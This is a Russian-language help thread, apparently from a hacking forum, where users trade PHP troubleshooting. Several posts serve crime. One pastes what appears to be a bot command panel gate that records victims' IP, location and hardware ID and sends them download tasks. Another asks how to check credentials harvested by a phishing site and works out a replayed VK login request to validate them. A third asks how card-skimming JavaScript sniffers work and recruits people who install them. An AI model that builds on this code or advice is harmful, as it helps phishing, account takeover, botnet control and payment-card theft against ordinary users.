• XSS.stack #1 – первый литературный журнал от юзеров форума

Вопрос - Ответ

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
reming сказал(а):
PHP: 
else if (isset($_GET['test1']) and isset($_GET['test2']) ) {
## SQL запрос
}
При таком раскладе не 1 запрос не обрабатывает.
 
обработает , если и test1 и test2 существуют , оба сразу
так и хотел комрад , имхо
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Мб что не так делаю посылаю 2 запроса:
index.php?test1=ok
index.php?test2=no
Эти запросы добавляют в базу соответственно значения в столбцы OK и NO

По отдельности запросы добавляются в разных таблицах

Весь код:

PHP: 
else if (isset($_GET['test1']) and isset($_GET['test2']) ) {
    $test1 = mysql_real_escape_string($_GET['test1']);

$test2 = mysql_real_escape_string($_GET['test2']);

    $d = date('m/d/Y h:i:s a', time());
    if(mysql_num_rows(mysql_query("SELECT * FROM `goods` WHERE `test1`='test1', `test2`='test2' ")) > 0){
        date_default_timezone_set('Etc/GMT+3');
        mysql_query("UPDATE `goods` SET `seen`='$d', `ip`='".$_SERVER['REMOTE_ADDR']."' WHERE `test1`='$test1', `test2`='test2' ");


        $response = "";
        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='On join' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='Every client once' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            if(mysql_num_rows(mysql_query("SELECT * FROM `completed` WHERE `test1`='$test1' AND `taskid`='".$task['id']."'")) < 1)
                $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        echo $response;

    }

    else{
        $loc = json_decode(file_get_contents('http://www.geoplugin.net/json.gp?ip='.$_SERVER['REMOTE_ADDR']), true);
        $c = $loc['geoplugin_countryName'];
        mysql_query("INSERT INTO `goods` SET `ip`='".$_SERVER['REMOTE_ADDR']."', `test1`='$test1', `test2`='$test2', `seen`='$d', `location`='$c'");
  

        $response = "";
        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='On join' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='Every client once' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            if(mysql_num_rows(mysql_query("SELECT * FROM `completed` WHERE `test1`='$test1' AND `taskid`='".$task['id']."'")) < 1)
                $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        echo $response;
    }
}
 
else if (.....)

подразумевает что до этого есть еще if конструкция
esle в переводе означает "иначе"
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
reming сказал(а):
подразумевает что до этого есть еще if конструкция
esle в переводе означает "иначе"
Выше только это:


PHP: 
else if (isset($_GET['completed'])){
     $hwid = mysql_real_escape_string($_GET['test1']);
     $id = mysql_real_escape_string($_GET['completed']);
     mysql_query("INSERT INTO `completed` SET `test1`='$test1', `taskid`='$id'");
     echo mysql_error();
}
Что такое if else мне знакомо, я на шарпе кодю.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
установил xampp ,импортировал базу sql в phpmyadmin,при конекте на локальный хост выдаёт вот такое

Код: 
Неустранимая ошибка : необработанная ошибка: вызов неопределенной функции mysql_connect () в C: \ xampp \ htdocs \ Server \ connect_db.php: 2 Трассировка стека: # 0 C: \ xampp \ htdocs \ Server \ attacker_panel.php (94): включить () # 1 {main}, брошенный в C: \ xampp \ htdocs \ Server \ connect_db.php в строке 2
 
подскажите, как реализовать проверку валидности, вводимых данных, на фишинговом сайте?
я скопировал post запрос с сайта, и попробовал отправить тоже самое со своего сервера но в ответ получаю 400 Bad Request Server
PHP: 
<?php
    $proxy = "login.vk.com";
    $port = "80";

    $fp = fsockopen($proxy, $port, $errno, $errstr, 30);
    stream_set_blocking($fp, false);
    if($fp)
    {
        $data = "act=login&role=al_frame&expire=&recaptcha=&captcha_sid=&captcha_key=&_origin=https%3A%2F%2Fvk.com&ip_h=c752a5225d8047ad49&lg_h=1d0ed2f0f8d74b2bb5&ul=&email=%2B79409999999&pass=asdfghjhgfds";
        $headers  = "POST login.vk.com/?act=login HTTP/1.1\r\n";
        $headers .= "Host: login.vk.com\r\n";
        $headers .= "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n";
        $headers .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $headers .= "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3\r\n"; 
        $headers .= "Accept-Encoding: gzip, deflate, br\r\n";
        $headers .= "Content-Type: application/x-www-form-urlencoded/=\r\n";
        $headers .= "Content-Length: 188\r\n";
        $headers .= "DNT: 1\r\n";
        $headers .= "Connection: keep-alive\r\n";
        $headers .= "Referer: https://vk.com/\r\n";
        $headers .= "Upgrade-Insecure-Requests: 1\r\n\r\n";
 
        $fw = fwrite($fp, $headers.$data);
        while (!feof($fp)) {
        echo fgets($fp, 128);
    }
        fclose($fp);
    } else die;
?>
подскажите где ошибка, или здесь вообще подход иной?
 
ZAMAN сказал(а):
подскажите, как реализовать проверку валидности, вводимых данных, на фишинговом сайте?
я скопировал post запрос с сайта, и попробовал отправить тоже самое со своего сервера но в ответ получаю 400 Bad Request Server
PHP: 
<?php
    $proxy = "login.vk.com";
    $port = "80";

    $fp = fsockopen($proxy, $port, $errno, $errstr, 30);
    stream_set_blocking($fp, false);
    if($fp)
    {
        $data = "act=login&role=al_frame&expire=&recaptcha=&captcha_sid=&captcha_key=&_origin=https%3A%2F%2Fvk.com&ip_h=c752a5225d8047ad49&lg_h=1d0ed2f0f8d74b2bb5&ul=&email=%2B79409999999&pass=asdfghjhgfds";
        $headers  = "POST login.vk.com/?act=login HTTP/1.1\r\n";
        $headers .= "Host: login.vk.com\r\n";
        $headers .= "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n";
        $headers .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $headers .= "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3\r\n";
        $headers .= "Accept-Encoding: gzip, deflate, br\r\n";
        $headers .= "Content-Type: application/x-www-form-urlencoded/=\r\n";
        $headers .= "Content-Length: 188\r\n";
        $headers .= "DNT: 1\r\n";
        $headers .= "Connection: keep-alive\r\n";
        $headers .= "Referer: https://vk.com/\r\n";
        $headers .= "Upgrade-Insecure-Requests: 1\r\n\r\n";

        $fw = fwrite($fp, $headers.$data);
        while (!feof($fp)) {
        echo fgets($fp, 128);
    }
        fclose($fp);
    } else die;
?>
подскажите где ошибка, или здесь вообще подход иной?
возможно ошибка в строке
$headers .= "Content-Length: 188\r\n";
но если заменить на
$headers .= "Content-Length:" .strlen($data) "\r\n";
ответ вообще не приходит
 
ZAMAN сказал(а):
подскажите, как реализовать проверку валидности, вводимых данных, на фишинговом сайте?
я скопировал post запрос с сайта, и попробовал отправить тоже самое со своего сервера но в ответ получаю 400 Bad Request Server

подскажите где ошибка, или здесь вообще подход иной?

Скорее всего, ошибка из-за того что серв запросы на авторизацию принимает только с определенных доменов. То есть если ты со своего шлешь запрос, он тебя шлет подальше.
Плюс я вижу там капча и хеш айпи, по ним тоже сверка идёт скорее всего, и ты её не проходишь.
 
ShishkaBob сказал(а):
Скорее всего, ошибка из-за того что серв запросы на авторизацию принимает только с определенных доменов. То есть если ты со своего шлешь запрос, он тебя шлет подальше.
Плюс я вижу там капча и хеш айпи, по ним тоже сверка идёт скорее всего, и ты её не проходишь.
нет, всё работает
в запросе опечатка:
PHP: 
$headers .= "Content-Type: application/x-www-form-urlencoded/=\r\n";
ещё в запрос нужно было куки добавить.
ответ сервера меняется, в зависимости от того, ввожу я валидный логин-пароль, или нет.
также сервер реагирует на: передаваемые в запрос кукисы(не все), и значение поля lg_h.

дальше я начал гавнокодить:
первое, через get_geaders("vk.com") получаю заголовки,
второе, спарсив куки получаю страницу через file_get_content добавив в него context с куками,
третье, получив поле lg_h формирую POST запрос передаю тута куки, lg_h, логин и пароль.
четвертое, иду ломать мебель в доме!!!, ибо полученный от сервера ответ, всегда говорит что, логин и пароль не верен,
пятое, иду просить помощь.
 
Подскажите пожалуйста куда копать.
Ситуация следующая, ставлю софт на сервер:
1. debian 8, php 5.6 в логе ошибка:
Код: 
PHP Notice:  Use of undefined constant DB_HOST - assumed 'DB_HOST' in /db_connect.php on line 4, referer:
PHP Notice:  Use of undefined constant DB_USER - assumed 'DB_USER' in /db_connect.php on line 4, referer:
PHP Notice:  Use of undefined constant DB_PASS - assumed 'DB_PASS' in /database/db_connect.php on line 4, referer:
PHP Fatal error:  Uncaught exception 'Exception' with message 'SafeMySQL: 2003 Can't connect to MySQL server on 'DB_HOST'
(111)' in /safemysql.php:580\nStack trace:\n#0 /safemysql.php(110): SafeMySQL->error('2003 Can't conn...')\n#1 /db_connect.php(4):
SafeMySQL->__construct(Array)\n#2 gate.php(2): include_once('/home/admin/web...')\n#3 {main}\n  thrown in /safemysql.php on line 580, referer: t.php
2. ставлю на свой локальный комп, mint 19, php 7.2 все работает без проблем. ок
3. ставлю на сервер centos 7, php 7.2 такая же проблема лезут ошибки.
Код файла db_connect.php
Код: 
<?php
    include_once "config.php";
    include_once "safemysql.php";
    $db = new SafeMySQL(array("host" => DB_HOST, "user" => DB_USER, "pass" => DB_PASS, "db" => DB_DATABASE, "charset" => 'utf8', "port" => DB_PORT));
?>
Я так понимаю что четвертая ошика выпадает из-за первых трех, также понимаю что где то просто решается, но блин понять не могу.
При установке файлы не менялись, ничего не трогалось, за исключением логин пасс на подключение к БД.
 
люди добрые подскажите как мигрировать код на php 7,пишет такую бодягу : Unknown: Function create_function() is deprecated in строка в коде:
PHP: 
usort($cats, create_function('$a, $b', 'return strnatcasecmp( $a["name"], $b["name"]);'));
 
hits сказал(а):
люди добрые подскажите как мигрировать код на php 7,пишет такую бодягу : Unknown: Function create_function() is deprecated in строка в коде:
PHP: 
usort($cats, create_function('$a, $b', 'return strnatcasecmp( $a["name"], $b["name"]);'));
Гугл-же:
stackoverflow.com

PHP 7.2 Function create_function() is deprecated

I have used create_function() in my application below. $callbacks[$delimiter] = create_function( '$matches', "return '$delimiter' . strtolower(\$matches[1]);" ); But for PHP 7.2.0,
stackoverflow.com stackoverflow.com
 
  • Установить на сервер официальный сервис Blockchain кошелька — https://github.com/blockchain/service-my-wallet-v3
  • Запустить на сервере сервис Blockchain кошелька в фоном режиме
  • Добавьте задание в планировщик задач на сервере для автоматического запуска сервиса Blockchain кошелька после перезагрузки сервера
Приветствую. Имеется CentOS7, PHP 7.3
1 и 2 пункт в сети решение отыскать можно, но последний пункт не нашел. Буду благодарен за помощь в реализации всех пунктов.
 
molinger сказал(а):
  • Добавьте задание в планировщик задач на сервере для автоматического запуска сервиса Blockchain кошелька после перезагрузки сервера
Если прям через планировщик, то
Код: 
crontab -e
@reboot /path/to/script
 
У меня технический вопрос касательно работы js сниферов, доступ к веб ресурсу и к его исходникам злоумышленник может получить посредством массы способов, НО вот сам принцип работы JS снифера мне не совсем ясен.. А именно... при оплате большинство магазинов нас перенаправляет на веб ресурс(сайт) банка эмитента нашей вводимой банковской карты где мы уже и вводим банковские данные... т.е у пользователя открывается новая вкладка или окно, а магазин с установленным снифером остается работать в 'старой' вкладке. Данные карты пользователь зачастую вводит именно на сайте банка эмитента где естественно у злоумышлиника нет никаких возможностей установить снифер(скорее всего проверяется BIN карты и открывается ресурс нужного банка) мой вопрос... каким именно способом снифер способен перехватывать вводимые данные ?) Он же не может перехватывать вводимые данные с абсолютно всех активных окон/вкладок в браузере пользователя? Если перехват осуществляется только в случае если данные карты вводятся именно в формы самого магазина к которому уже есть доступ у злоумышленника то тогда мой вопрос снимается...

PS: ЛС читаю, если есть люди занимающиеся установкой сниферов то могут отписать в ЛС.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
добрий день буду краток не подскажите как установить

  1. RollingCurl - _ttps://github.com/takinbo/rolling-curl
чтоб при запуске через консоль програми с данной библиотекой корректно работали (заранее спасибо)
 
Ott_Fon_Bismark сказал(а):
добрий день буду краток не подскажите как установить

  1. RollingCurl - _ttps://github.com/takinbo/rolling-curl
чтоб при запуске через консоль програми с данной библиотекой корректно работали (заранее спасибо)
А в чем собственно проблема?
Просто require("RollingCurl.php"); в тот файл где используешь
Бтв может у тебя самого Curl'a нету?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх